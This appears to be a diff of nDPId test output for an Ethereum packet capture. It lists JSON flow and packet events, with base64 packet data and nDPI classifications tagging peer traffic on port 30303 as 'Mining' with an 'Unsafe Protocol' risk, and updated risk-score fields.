+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"}
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"}
 01973{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAASM2BBAADcR1ngiYawWwKgBuHZfdl8EeMBgH0wTNhnEtwanpj7oWlZ\/Hp0Gak0vyLNY48lrCKzEN97iWOlAwiKU8J2As0GDwpvqMobAk\/doYUwERgBj\/dX1qwI+w93bqV+opA8zeXK5DOY5QqaAWe1EmRlafyw14V0SAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2ENiSg04J2X4J2X7hAPRqHFTz0e8oEsmOadgUbUG0\/Gq1XFXFWshB59yMDlMnzDbSaQte3vRlNp0x8bXK\/C0IExkQW+7e6O42uaIsSOfhNhG\/lALSCTtaCTta4QNKaGvf27ePtI09PYWMWWoqsTgBFWVV\/OStWx2mo9mqS58z7TiK83yibq71BZSi0CSsekwb4Zyr8nj5zQd0mqCb4TYSkhGWfgnZfgnZfuEBoaZQlH\/tAMTmENPyYivdiK6qXFlTxe+\/p6cPLqiael7D6BFBiRXZHacw3oUOaGk4+u32W1NMUjoJXk06B2mEI+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhHLbOhmCTtaCTta4QOsAfRHCWayd+ePpaQzEOGf3dXjZZgxjuurzp9q\/DaDAlIrlX0hFIpZGowqYAlmPGRQlb2Zp7G196tUzRB5lA1D4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2EI9yzYIJ2YIJ2YLhAOJyQU2JE6mr+PrqS1VpbvrNoILvKRQR+abFnLs+XgISTnL1u7Up3BqfrKb9hyDFv4+EivNbWhPn9c0jykBsfLvhNhC9ngvuCdmKCdmK4QMQewuj5qn6FtR+caLmA7fiCCCWlXl5n4eHsa\/hStv5IXJfR3qW2xYlmjRashSfhzXIk\/cArlEuFCVyLKkliTzj4TYR68x8XgglNgk7WuEDyUr+wEhCRTzC+abav+Qq8gCoJQuHHGbcH\/DZQmfl9EGgUirj+pxEJRc8L7rXREu747IWcesHQp9HRE6vORWkC+E2E1W2gk4Kvx4Kvx7hAdMXaCMYMMwBE0nd2ZguY7X9OffS41d7S\/Y+mPW\/bN2r4s5PDjCrWaOVF\/TvDBjFcUWsPiqOXMHIqsOoggNo9SvhNhE4vwp6Cdl+Cdl+4QPkOM4NqDnpAiCaFdcv7mpRSPLANloklV4wbFH\/35BGlAWuLnC96pYG30ySaUekbUEoxDdJFuDpuhxs7uesYXD\/4TYSOLK6TgnZhgnZhuEDoktJdZWuqibhkACX5AYXpi\/92jauNHaPZe57KQENT7f3lptm8vn\/KsHCyQGycNosbcDhgVNlPlUl4B5KRi2QIhF4WIGA="}
 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAAF02BFAADcR2Y8iYawWwKgBuHZfdl8BYBsKk2vVIKFBe5srt6TuKGLoSQyIYHTHTIh8E6CjfYCc9i8bqGNRb1RdySNn+Iv9WrBeYgM40YLK2f29HLFDjWvrLH5PzXOrZjlyFrfNSw\/LgHRZLq7JZkTKJJivek9A0KFTAQT49Pjt+E2EWSTXC4J2YYJ2YbhAKsm6hrEBgceppDA8y6y8ToI4LATCvXtK2lH6G5Ea4z\/xJThSCDAuG5MSvtPStPEkcnXcb7SOx0jpL4DMcyqusPhNhJ+KPreCdl+Cdl+4QFFks1Hi1w5Dzl6eTycY4XMH5jgPi\/IsM\/Xh\/aiCTq6KUBnNNvsH2QEEcq8Eurha1gzN35pyz9iUxxW+rcV0tUj4TYTPtOCBgg09gg09uEBD39Z7PE\/miF\/gBzQtLgOKuJmlQiP1\/EPNHjqCw\/jys2eg7dySq1uz5KP5CQPL3LPisAyyzl2cNiKWtBUo4PgQhF4WIGA="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1578508364697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364697,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHkfoAAEARTtTAqAG4NiSg03Zfdl8As+iZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 01864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7gO1AADART9iAADOMwKgBuHZfdl8EJxcg9PffAeslidE0A2XYKUWPfQSrSzELT24RQsZMkDFAUC\/8t71UobxaKgVF9YFxtOS9Li4RLrxMDnrT4k5PGgw2NDHZtKrKg8J\/d2YlScEj\/YBR+sG3bhx8yqSCwFLu+QmtAQT5A7r5A7L4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2ETi\/CnoJ2X4J2X7hA+Q4zg2oOekCIJoV1y\/ualFI8sA2WiSVXjBsUf\/fkEaUBa4ucL3qlgbfTJJpR6RtQSjEN0kW4Om6HGzu56xhcP\/hNhF6CJvWCdl+Cdl+4QCa0AdVA2\/h5KxbzG7wSXhKLcgLDQf3VZM6j4pcDpEr22I0w8vjr3eeZrANzqy+B0k7Jw6sj9qOYOkYu9v1\/HcL4S4QXZGXDgsVFgLhA4dMHiHESZvaZv5XwOSEg7GIAhtTuq\/1+kuZamW7NEWy5Mx7jYjqriPSY+yi8MCrIJ809xx8ts8E05ybrI5RK9vhNhHTKaT+Cdl+Cdl+4QNscTNh1YzVnvcLB2a2lU2bz3gyaTlXXbE+pFLDVoDdFI5ADpod42cruH9wQt79YZLxlJa01FygTlV6X9wnzbsb4TYRSpWAfgnZhgnZhuECxFAegsyOgyfrql\/zztxCELDSekbbhUJf21H8iSNiW9cKP2xirrTz8RKLVHxNA2LkFNcMF8l9m+GUUJJ3wo0ve+E2EZ\/0rzIJ2X4J2X7hA0+1Q\/zfDwmqiJ4L7\/yvPXaADca3\/aoKeqi6XasejIDSTPmS2ILmdZ2LgwWGNQRAtsR66VqR5PIUppHE6JTXzu\/hNhC9aDGqCdl+Cdl+4QEWucUJTr5uswusybUrNZinvmACa+spHP3M8Ca80aMiKTDP2An9QqqbsJgkcvDnFqQSdwmVB0j3FFWWOWXchmBH4TYQ03B+BglLcglLcuEC4ECYNzxwi2kJoJQjyJ6lUniuRlC+UndNWqAZRufW0X533Ymm1WtW8x0w\/1eGqPwGeOGNfU57w7mmrZv5S0MuC+E2EoBCKUoJ2X4J2X7hA7pvrsi4uzujUwcCnzbOXM3k+PSTxp6vSaGlZ+vjNNS2DLnFg12pt76j1a3+aMxZ2sjeuJ4ACTqyhbBihj1yObfhNhLB96meCdl+Cdl+4QMGwHxHg22IaagGZCrHWyox4ceWSrkz5+TUJ7FvSKEAsyUrKnBQ1BKg4U4OyDXv653Ump5Su2Klg\/PAjth\/4FVX4TYQDCFzcgnZfgnZfuEAOe5LjgOGocDnrwWucrGwohrnh\/PIVvUNi2EPcxA3lL9o2I1kGKrrcltIHdy07g5GmzReWD9IntTCd9ncDRnHuhF4WIGA="}
 01004{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFgO5AADARUk2AADOMwKgBuHZfdl8BsUbFE+HTPyEyomNSay73CyfrLD8rHnhX7vxj92G3He3rB8i3yggvxA3gI120fMxC8T5NSVg69zUML0xXdXDn6x+i1UJlYzm2ZsL8HkXRcVxsD7\/Cz8uc2cDeR5GmI31rs3BBAAT5AUT5ATz4TYRWzyr3gnZfgnZfuEAwPG4npPFCKterF6wXX6hmKDtHpPLV5Gpyh4HRvQlb1WOtMBiFa5iB1p48IlU7yQzlUhHlEKU2TAWk+UxWCOtE+E2EwKkGMYJ2X4J2X7hAXDWjwnntCdEfY7ZsbIcma6dZim0sS\/6AZlg+cBMsOylaupmT4K85DC7A88jAAB9\/AkNP7Q7FRuWOzTw655z20fhNhF\/YD6SCdl+Cdl+4QMhe7o3oH5yNMBpAbg7BFfLQiRhzAx0IcRlGupvV\/Zui89t4l4x5tGAZhBv4cgNKbiHVFqGfCeCtDh7KA5ZNUtn4TYQ2yX4zgnZfgnZfuEBWXo894U5qji3Sd9oPTupJEBwpi5JkOWop7uGO9PMehSCnS4eHg4+tauk7NJIwG19teeCjKxS93DtycMhLIWGEhF4WIGA="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1578508364732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508364732,"pkt":"EBMx8Tl2KDc3AG3ICABFAACccxcAAEAR1EDAqAG4b+UAtHZfTtYAiDTvS0gyrIvyYAXql+rzEz+AR\/cLOiJor5McpZ3aQTzvVtbxvdlPVHOvm8x2T63kxRajQJXVXM7hf79y1fQG9XWokxXgcqkKLlUPoIFVVYrTntTkZjbBJdoltYqy5v2xN8\/CAAHdBMuEfwAAAYJ2X4J2X8mEb+UAtIJO1oCEXhYgYAU="}
